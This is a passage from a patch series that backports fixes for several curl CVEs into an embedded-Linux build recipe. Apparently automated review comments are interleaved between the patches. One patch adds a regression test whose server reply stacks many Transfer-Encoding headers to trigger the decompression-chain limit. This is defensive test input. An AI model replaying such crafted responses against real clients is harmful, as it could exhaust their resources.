+--
+2.34.1
+
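Review bot: Switching the loop in `parsenetrc()` to `Curl_get_line()` changes which lines are parsed at all, and nothing at the call site documents that. According to the helper's own comment it returns only lines that fit in the buffer and end with a newline, so a `.netrc` entry longer than the 4096-byte `netrcbuffer`, or a final entry without a trailing newline, would now be skipped silently (inferred from the comment; the helper body is not in this hunk). A skipped entry means credentials are quietly not applied, so I would add a comment at the loop such as `/* Curl_get_line() drops over-long lines and a last line without '\n' */` and confirm the behaviour against the target tree. `parsenetrc()` begins and ends outside the hunk.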
diff --git a/meta/recipes-support/curl/curl/CVE-2022-43552.patch b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
new file mode 100644
index 0000000000..d729441454
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
+rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 19 Dec 2022 08:38:37 +0100
+Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
+
+It is managed by the generic layer.
+
+Reported-by: Trail of Bits
+
+Closes #10112
+
+CVE: CVE-2022-43552
+Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/smb.c | 14 ++------------
+ lib/telnet.c | 3 ---
+ 2 files changed, 2 insertions(+), 15 deletions(-)
+
+diff --git a/lib/smb.c b/lib/smb.c
+index 12f9925..8db3b27 100644
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
+ static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
+ static CURLcode smb_do(struct connectdata *conn, bool *done);
+ static CURLcode smb_request_state(struct connectdata *conn, bool *done);
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature);
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
+ static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
+ static CURLcode smb_parse_url_path(struct connectdata *conn);
+@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
+ "SMB", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
+ "SMBS", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
+ return CURLE_OK;
+ }
+
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature)
+-{
+- (void) premature;
+- Curl_safefree(conn->data->req.protop);
+- return status;
+-}
+-
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
+ {
+ struct smb_conn *smbc = &conn->proto.smbc;
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 3347ad6..e3b9208 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
+
+ curl_slist_free_all(tn->telnet_vars);
+ tn->telnet_vars = NULL;
+-
+- Curl_safefree(conn->data->req.protop);
+-
+ return CURLE_OK;
+ }
+
+--
+2.25.1
+
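Review bot: The first line of this patch file reads `rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001`, so the leading `F` of the mbox `From ` line is missing. Tools that skip leading text will probably still apply the hunks, but anything that parses the header (`git am`, or scripts that extract the upstream commit id for CVE tracking) will not recognise it. Restore it as `From 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001`.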
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
+From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 13 Feb 2023 08:33:09 +0100
+Subject: [PATCH] content_encoding: do not reset stage counter for each header
+
+Test 418 verifies
+
+Closes #10492
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
+CVE: CVE-2023-23916
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/content_encoding.c | 7 +-
+ lib/urldata.h | 1 +
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test418 | 152 ++++++++++++++++++++++++++++++++++++++++
+ 4 files changed, 157 insertions(+), 5 deletions(-)
+ create mode 100644 tests/data/test418
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 91e621f..7e098a5 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
+- int counter = 0;
+
+ do {
+ const char *name;
+@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
+- if(++counter >= MAX_ENCODE_STACK) {
+- failf(data, "Reject response due to %u content encodings",
+- counter);
++ if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to more than %u content encodings",
++ MAX_ENCODE_STACK);
+ return CURLE_BAD_CONTENT_ENCODING;
+ }
+ /* Stack the unencoding stage. */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ad0ef8f..168f874 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -648,6 +648,7 @@ struct SingleRequest {
+ #ifndef CURL_DISABLE_DOH
+ struct dohdata doh; /* DoH specific data for this request */
+ #endif
++ unsigned char writer_stack_depth; /* Unencoding stack depth. */
+ BIT(header); /* incoming data has HTTP header */
+ BIT(content_range); /* set TRUE if Content-Range: was found */
+ BIT(upload_done); /* set to TRUE when doing chunked transfer-encoding
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 60e8176..40de8bc 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
+ test393 test394 test395 \
+ \
+ test400 test401 test402 test403 test404 test405 test406 test407 test408 \
+-test409 \
++test409 test418 \
+ \
+ test490 test491 test492 \
+ \
+diff --git a/tests/data/test418 b/tests/data/test418
+new file mode 100644
+index 0000000..50e974e
+--- /dev/null
++++ b/tests/data/test418
+@@ -0,0 +1,152 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++gzip
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<data nocheck="yes">
++HTTP/1.1 200 OK
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++
++-foo-
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<server>
++http
++</server>
++ <name>
++Response with multiple Transfer-Encoding headers
++ </name>
++ <command>
++http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<protocol crlf="yes">
++GET /%TESTNUMBER HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++User-Agent: curl/%VERSION
++Accept: */*
++
++</protocol>
++
++# CURLE_BAD_CONTENT_ENCODING is 61
++<errorcode>
++61
++</errorcode>
++<stderr mode="text">
++curl: (61) Reject response due to more than 5 content encodings
++</stderr>
++</verify>
++</testcase>
+--
+2.25.1
+
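Review bot: The new `writer_stack_depth` field in `struct SingleRequest` is only ever incremented in this patch, and its comment `/* Unencoding stack depth. */` does not say where it returns to zero. The fix needs the counter to persist across all headers of one response but not across transfers; if the request struct is not cleared per transfer in this older tree, a reused handle would start rejecting valid responses with `CURLE_BAD_CONTENT_ENCODING` (this cannot be verified from the hunk). Once confirmed, I would extend the comment to `/* Unencoding stack depth; counts stages across all headers of one response, cleared with the rest of SingleRequest */`. Minor: `MAX_ENCODE_STACK` is a plain `5`, so the `%u` in the new `failf()` call receives an `int`; `%d` would match.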
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27533.patch b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
new file mode 100644
index 0000000000..64ba135056
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
+Backport of:
+
+From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 6 Mar 2023 12:07:33 +0100
+Subject: [PATCH] telnet: only accept option arguments in ascii
+
+To avoid embedded telnet negotiation commands etc.
+
+Reported-by: Harry Sintonen
+Closes #10728
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
+CVE: CVE-2023-27533
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/telnet.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
+ }
+ }
+
++static bool str_is_nonascii(const char *str)
++{
++ size_t len = strlen(str);
++ while(len--) {
++ if(*str & 0x80)
++ return TRUE;
++ str++;
++ }
++ return FALSE;
++}
++
+ static CURLcode check_telnet_options(struct connectdata *conn)
+ {
+ struct curl_slist *head;
+@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
+ /* Add the user name as an environment variable if it
+ was given on the command line */
+ if(conn->bits.user_passwd) {
++ if(str_is_nonascii(data->conn->user))
++ return CURLE_BAD_FUNCTION_ARGUMENT;
+ msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
+ beg = curl_slist_append(tn->telnet_vars, option_arg);
+ if(!beg) {
+@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
+ if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
+ option_keyword, option_arg) == 2) {
+
++ if(str_is_nonascii(option_arg))
++ continue;
++
+ /* Terminal type */
+ if(strcasecompare(option_keyword, "TTYPE")) {
+ strncpy(tn->subopt_ttype, option_arg, 31);
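Review bot: In `check_telnet_options()` the added check validates `data->conn->user`, while the `msnprintf()` on the next line copies `conn->user`. They presumably refer to the same connection, but a check that names a different expression from the one it protects is easy to break in a later refactor; use `if(str_is_nonascii(conn->user))`. Separately, the option-argument check drops a rejected option with a bare `continue`, so the caller gets no indication that a telnet option was ignored; an `infof()` before the `continue` would make that diagnosable. The function starts and ends outside the hunk.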
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
+From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
+From: Eric Vigeant <evigeant@gmail.com>
+Date: Wed, 2 Nov 2022 11:47:09 -0400
+Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
+
+When using SFTP and a path relative to the user home, do not add a
+trailing '/' to the user home dir if it already ends with one.
+
+Closes #9844
+
+CVE: CVE-2023-27534
+Note:
+- The upstream patch for CVE-2023-27534 does three things:
+1) creates new path with dynbuf(dynamic buffer)
+2) solves the tilde error which causes CVE-2023-27534
+3) modifies the below added functionality to not add a trailing "/" to the user home dir if it already ends with one with dynbuf.
+- dynbuf functionalities are added in curl in later versions and are not essential to fix the vulnerability but does add extra feature in later versions.
+- This patch completes the 3rd task of the patch which was implemented without using dynbuf
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index f429634..40b92ee 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ /* It is referenced to the home directory, so strip the
+ leading '/' */
+ memcpy(real_path, homedir, homelen);
+- real_path[homelen] = '/';
+- real_path[homelen + 1] = '\0';
++ /* Only add a trailing '/' if homedir does not end with one */
++ if(homelen == 0 || real_path[homelen - 1] != '/') {
++ real_path[homelen] = '/';
++ homelen++;
++ real_path[homelen] = '\0';
++ }
+ if(working_path_len > 3) {
+- memcpy(real_path + homelen + 1, working_path + 3,
++ memcpy(real_path + homelen, working_path + 3,
+ 1 + working_path_len -3);
+ }
+ }
+--
+2.24.4
+
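Review bot: When `homedir` already ends in `/`, the new `if` block is skipped and nothing writes a terminating NUL into `real_path`; the only other writer is the `memcpy()` guarded by `working_path_len > 3`. For a working path of exactly three bytes (`/~/`, which the follow-up CVE-2023-27534.patch still admits through `working_path_len > 2`), the buffer obtained from `malloc()` is therefore left unterminated. Write the terminator unconditionally: keep `real_path[homelen] = '/'; homelen++;` inside the `if` and move `real_path[homelen] = '\0';` to just after its closing brace. `Curl_getworkingpath()` begins and ends outside this hunk.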
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
+From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 16:22:11 +0100
+Subject: [PATCH] curl_path: create the new path with dynbuf
+
+Closes #10729
+
+CVE: CVE-2023-27534
+Note: This patch is needed to backport CVE-2023-27534
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index 40b92ee..598c5dd 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ memcpy(real_path, working_path, 1 + working_path_len);
+ }
+ else if(conn->handler->protocol & CURLPROTO_SFTP) {
+- if((working_path_len > 1) && (working_path[1] == '~')) {
++ if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
+ size_t homelen = strlen(homedir);
+ real_path = malloc(homelen + working_path_len + 1);
+ if(real_path == NULL) {
+--
+2.24.4
+
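Review bot: The subject `curl_path: create the new path with dynbuf` does not match the content of this patch. The only change is the prefix test in `Curl_getworkingpath()`, from `working_path[1] == '~'` to `!memcmp(working_path, "/~/", 3)`, and no dynbuf code is added. The header line `Note: This patch is needed to backport CVE-2023-27534` also reads as if this were a prerequisite, whereas it appears to carry the tilde fix itself. I would say so in the header, for example `Note: only the "/~/" prefix check is taken from the upstream commit; the dynbuf rewrite is not backported`, so that CVE tracking against this file stays accurate.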
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
+From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 6 Oct 2022 00:49:10 +0200
+Subject: [PATCH] strcase: add and use Curl_timestrcmp
+
+This is a strcmp() alternative function for comparing "secrets",
+designed to take the same time no matter the content to not leak
+match/non-match info to observers based on how fast it is.
+
+The time this function takes is only a function of the shortest input
+string.
+
+Reported-by: Trail of Bits
+
+Closes #9658
+
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/netrc.c | 6 +++---
+ lib/strcase.c | 22 ++++++++++++++++++++++
+ lib/strcase.h | 1 +
+ lib/url.c | 33 +++++++++++++--------------------
+ lib/vauth/digest_sspi.c | 4 ++--
+ lib/vtls/vtls.c | 21 ++++++++++++++++++++-
+ 6 files changed, 61 insertions(+), 26 deletions(-)
+
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 9323913..fe3fd1e 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
+ /* we are now parsing sub-keywords concerning "our" host */
+ if(state_login) {
+ if(specific_login) {
+- state_our_login = strcasecompare(login, tok);
++ state_our_login = !Curl_timestrcmp(login, tok);
+ }
+- else if(!login || strcmp(login, tok)) {
++ else if(!login || Curl_timestrcmp(login, tok)) {
+ if(login_alloc) {
+ free(login);
+ login_alloc = FALSE;
+@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
+ }
+ else if(state_password) {
+ if((state_our_login || !specific_login)
+- && (!password || strcmp(password, tok))) {
++ && (!password || Curl_timestrcmp(password, tok))) {
+ if(password_alloc) {
+ free(password);
+ password_alloc = FALSE;
+diff --git a/lib/strcase.c b/lib/strcase.c
+index 70bf21c..ec776b3 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
+ return !a && !b;
+ }
+
++/*
++ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
++ * function spends is a function of the shortest string, not of the contents.
++ */
++int Curl_timestrcmp(const char *a, const char *b)
++{
++ int match = 0;
++ int i = 0;
++
++ if(a && b) {
++ while(1) {
++ match |= a[i]^b[i];
++ if(!a[i] || !b[i])
++ break;
++ i++;
++ }
++ }
++ else
++ return a || b;
++ return match;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index 8929a53..8077108 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
+ bool Curl_safecmp(char *a, char *b);
++int Curl_timestrcmp(const char *first, const char *second);
+
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9f14a7b..dfbde3b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
+ /* the user information is case-sensitive
+ or at least it is not defined as case-insensitive
+ see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
+- if((data->user == NULL) != (needle->user == NULL))
+- return FALSE;
+- /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->user &&
+- needle->user &&
+- strcmp(data->user, needle->user) != 0)
+- return FALSE;
+- if((data->passwd == NULL) != (needle->passwd == NULL))
+- return FALSE;
++
+ /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->passwd &&
+- needle->passwd &&
+- strcmp(data->passwd, needle->passwd) != 0)
++ if(Curl_timestrcmp(data->user, needle->user) ||
++ Curl_timestrcmp(data->passwd, needle->passwd))
+ return FALSE;
+ return TRUE;
+ }
+@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd) ||
+- !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
+- !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd) ||
++ Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
++ Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
+ possible. (Especially we must not reuse the same connection if
+ partway through a handshake!) */
+ if(wantNTLMhttp) {
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd)) {
+
+ /* we prefer a credential match, but this is at least a connection
+ that can be reused and "upgraded" to NTLM */
+@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!check->http_proxy.user || !check->http_proxy.passwd)
+ continue;
+
+- if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
+- strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
++ if(Curl_timestrcmp(needle->http_proxy.user,
++ check->http_proxy.user) ||
++ Curl_timestrcmp(needle->http_proxy.passwd,
++ check->http_proxy.passwd))
+ continue;
+ }
+ else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
+diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
+index a109056..3986386 100644
+--- a/lib/vauth/digest_sspi.c
++++ b/lib/vauth/digest_sspi.c
+@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
+ has changed then delete that context. */
+ if((userp && !digest->user) || (!userp && digest->user) ||
+ (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
+- (userp && digest->user && strcmp(userp, digest->user)) ||
+- (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
++ (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
++ (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
+ if(digest->http_context) {
+ s_pSecFn->DeleteSecurityContext(digest->http_context);
+ Curl_safefree(digest->http_context);
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e8cb70f..70a9391 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ Curl_safecmp(data->issuercert, needle->issuercert) &&
+ Curl_safecmp(data->clientcert, needle->clientcert) &&
+ Curl_safecmp(data->random_file, needle->random_file) &&
+- Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++#ifdef USE_TLS_SRP
++ !Curl_timestrcmp(data->username, needle->username) &&
++ !Curl_timestrcmp(data->password, needle->password) &&
++ (data->authtype == needle->authtype) &&
++#endif
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
++ Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+ return TRUE;
+
+@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ dest->verifyhost = source->verifyhost;
+ dest->verifystatus = source->verifystatus;
+ dest->sessionid = source->sessionid;
++#ifdef USE_TLS_SRP
++ dest->authtype = source->authtype;
++#endif
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
+@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ CLONE_STRING(cipher_list);
+ CLONE_STRING(cipher_list13);
+ CLONE_STRING(pinned_key);
++ CLONE_STRING(CRLfile);
++#ifdef USE_TLS_SRP
++ CLONE_STRING(username);
++ CLONE_STRING(password);
++#endif
+
+ return TRUE;
+ }
+@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ Curl_safefree(sslc->cipher_list);
+ Curl_safefree(sslc->cipher_list13);
+ Curl_safefree(sslc->pinned_key);
++ Curl_safefree(sslc->CRLfile);
++#ifdef USE_TLS_SRP
++ Curl_safefree(sslc->username);
++ Curl_safefree(sslc->password);
++#endif
+ }
+
+ #ifdef USE_SSL
+--
+2.25.1
+
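Review bot: The `Comment:` line describes this patch as adding Curl_timestrcmp, but the lib/vtls/vtls.c part does more: it adds the TLS-SRP `username`/`password`/`authtype` and `CRLfile` to `Curl_ssl_config_matches`, and clones and frees them, which changes when a TLS connection is considered reusable. Those members are used on `struct ssl_primary_config`, yet no header declaring them appears in the diffstat, so the patch presumably relies on an earlier one in the series; that dependency should be named in the header. Separately, `state_our_login = !Curl_timestrcmp(login, tok);` in parsenetrc replaces `strcasecompare`, so the netrc login match becomes case-sensitive, which also deserves a line in the header. A suggested wording is `Comment: adds Curl_timestrcmp for the CVE-2023-27535 backport; the vtls.c part also adds TLS-SRP credentials and CRLfile to the TLS config match`.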
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
+From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 17:47:06 +0100
+Subject: [PATCH] ftp: add more conditions for connection reuse
+
+Reported-by: Harry Sintonen
+Closes #10730
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
+CVE: CVE-2023-27535
